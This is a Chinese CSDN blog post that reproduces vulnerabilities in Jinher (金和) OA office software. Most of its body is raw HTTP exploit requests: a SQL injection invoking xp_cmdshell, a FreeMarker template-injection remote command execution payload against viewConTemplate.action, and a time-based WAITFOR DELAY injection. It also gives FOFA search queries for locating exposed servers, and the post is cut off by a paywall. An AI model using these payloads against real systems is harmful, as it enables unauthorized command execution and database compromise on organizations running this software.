漏洞复现-金和OA系列

已于 2024-03-15 15:01:27 修改
阅读量963 收藏 22
点赞数 23
分类专栏: 网络安全-渗透测试 文章标签: 安全 web安全 运维
于 2024-03-14 16:59:40 首次发布
amingMM
本文链接:https://blog.csdn.net/qq_33608000/article/details/136715288
版权

在这里插入图片描述

漏洞复现-金和OA系列

金和 0A C6-GetSqlData.aspx SQL 注入

POST /C6/Contro1/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: lozi1la/5.0 (Windows NT 5.1) ppleWebKit/537.36 (KHTMLlike Gecko)
Chrome/35.0.2117.157 Safari/537.36Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
exec master..xp_cmdshell'ipconfig'

(21).金和OA--------------------------------------------fofa:app=“金和网络-金和OA”

🗡金和OA jc6 RCE

https://mp.weixin.qq.com/s/8VTorC_boGqtYk7qlsHyNg在这里插入图片描述

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA viewConTemplate.action存在远程命令执行漏洞。

app=“金和网络-金和OA”||body=“/jc6/platform/sys/login”


POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

在这里插入图片描述

请联系厂家 http://www.jinher.com/升级

金和OA GetTreeDate.aspx SQL注入

【新】金和OA RssModulesHttp.aspx接口SQL注入漏洞复现

https://mp.weixin.qq.com/s/RM0gZfnSs4hsGa6MerqDog

GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
Host: 
accept: */*
User-Agent: Mozilla/5.0 (Windows NT
最低0.47元/天 解锁文章
amingMM
关注
  • 23
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
博客
红队系列-网络安全知识锦囊(持续更新)
11-09 518
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
博客
Python AI股票自动化量化交易经济金融市场分析(每日更新)
10-14 677
一种基于量化分析(Quantitative Analysis)的交易方式。量化交易需要三大技能: 数学功底、编程技能、金融知识。网上有种说法,从事量化交易需要的知识比重如下:计算机-金融-数学,知识比重为1-3-6。
博客
红队专题-渗透工具-hydra爆破神器
03-15 597
主要步骤讲完后,下面来看看整个代码,看如何用shell程序将这些串起来。当然,能否破解成功,有一个好用的工具固然重要,但还需要一个强健的密码本。grep “host:”用来过滤打印的输出,只输出破解到密码的条目。第二步为,读取22-output.txt文件中开放22端口的主机,这条命令的含义是采用密码本./password.txt中的密码,因此,在shell中写了一个循环,hydra一次任务结束后,遍历代码很简单,不用惊讶,这就是shell脚本的神奇之处。对一个网段的扫描,也可以换成一个IP。
博客
漏洞复现-H3C系列
03-15 750
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
博客
漏洞复现-红帆OA系列
03-15 1155
红帆OA--------------------------------------------fofa:app=“红帆-ioffice”
博客
漏洞复现-宏景HJSOFT系列
03-15 1130
宏景HCM--------------------------------------------fofa:app=“HJSOFT-HCM”
博客
漏洞复现-海康威视系列
03-15 440
综合安防系统是一款功能强大的综合性管理平台,其特点是视频监控与门禁一卡通的深度融合,海康的系统在系统中大量存在,出于学习的目的,通过授权测试对象对该漏洞进行研究和复现。自查方式:通过发送前文提到的漏洞探测数据包,观察返回的状态码为200,并且提示token empty!字样则可能存在漏洞,需要及时排查修复。修复建议:关闭互联网暴露面访问的权限,文件上传模块做好权限强认证。海康威视综合安防系统 iVMS-8700。海康威视综合安防系统iVMS-5000。
博客
漏洞复现-大华dahua系列
03-15 417
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台devicePoint_addImgIco存在文件上传漏洞,攻击者利用该漏洞可以获取服务器权限。app=“dahua-智慧园区综合管理平台”
博客
漏洞复现-金蝶系列
03-14 988
金蝶软件是中国领先的企业管理软件及云服务提供商,拥有众多产品和解决方案,其中包括四个主要产品系列。这四个产品系列分别是:金蝶ERP(Enterprise Resource Planning): 金蝶ERP是金蝶软件的核心产品之一,是一套全面的企业管理软件解决方案,涵盖了财务、供应链管理、生产制造、人力资源管理等多个领域,为企业提供全面的业务管理功能。金蝶ERP产品线包括不同版本,以满足不同规模和行业的企业需求。
博客
漏洞复现-锐捷Ruijie系列
03-14 665
“系统升级有效期已到” && “URL 库文件已过期”
博客
开发知识点-Python-conda
03-14 338
Python-condahttps://conda.io/miniconda.htmlconda search python conda env list conda deactivateconda activate python11conda 是一个流行的开源包管理系统,它支持多种 Python 版本。 使用 cond...
博客
项目技术栈-解决方案-消息队列
03-14 379
项目技术栈-解决方案-消息队列概念应用场景1. 异步处理参考文章消息队列(Message Queue)概念“消息”是在两台计算机间传送的数据单位。 消息可以非常简单,例如只包含文本字符串; 也可以更复杂 ,包括对象等。队列是一种数据结构,先进先出,保证了顺序性。生产者:发送消息的一端。用于把消息写入到队列中消费者:从消息队...
博客
漏洞复现-万户ezOFFICE系列
03-12 1154
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
博客
漏洞复现-蓝凌LandrayOA系列
03-08 1553
LandrayOA_sysSearchMain_Rce漏洞。LandrayOA_Custom_SSRF_JNDI漏洞。LandrayOA_Custom_FileRead漏洞。
博客
运维知识点-Apache HTTP Server
03-08 675
【代码】运维知识点-Apache。
博客
运维知识点-JBoss
03-08 423
JBoss是一个基于J2EE的开放源代码的应用服务器,也是一个运行EJB(Enterprise JavaBean)的容器和服务器。它支持EJB 1.1、EJB 2.0和EJB3的规范,体现了J2EE规范中最新的技术。JBoss遵循LGPL许可,可以在任何商业应用中免费使用,并且由开源社区开发,这使得JBoss广为流行。JBoss从最初作为一个EJB容器,已经发展成为一个基于J2EE的web操作系统,提供了丰富的功能和特性。
博客
开发知识点-Apache Struts2框架
03-08 783
【代码】开发知识点-Apache Struts2框架。
博客
运维知识点-Tomcat
03-08 678
【代码】运维知识点-Tomcat。
博客
开发知识点-Apache Axis2框架
03-08 1089
访问shell路径:http://192.168.0.104:8080/axis/…/shell.jsp。poc脚本写入shell。
博客
红队专题-漏扫-Xray
03-08 911
Xray扫描器是一款功能强大的安全评估工具,它主要使用HTTP/HTTPS代理进行被动扫描。这款工具由多名经验丰富的一线安全从业者开发,具备多种特性使其在安全扫描和漏洞检测方面表现出色。Xray扫描器支持多种扫描和检测模块,包括SQL注入检测、命令注入检测、任意重定向检测、路径遍历模块等。此外,它还具有一些内置插件,如XSS漏洞检测、XML实体注入检测等,这些插件能够进一步提升其漏洞检测能力。在使用Xray扫描器时,可以通过开启监听、设置浏览器代理等方式,使其能够自动探测访问网站的漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值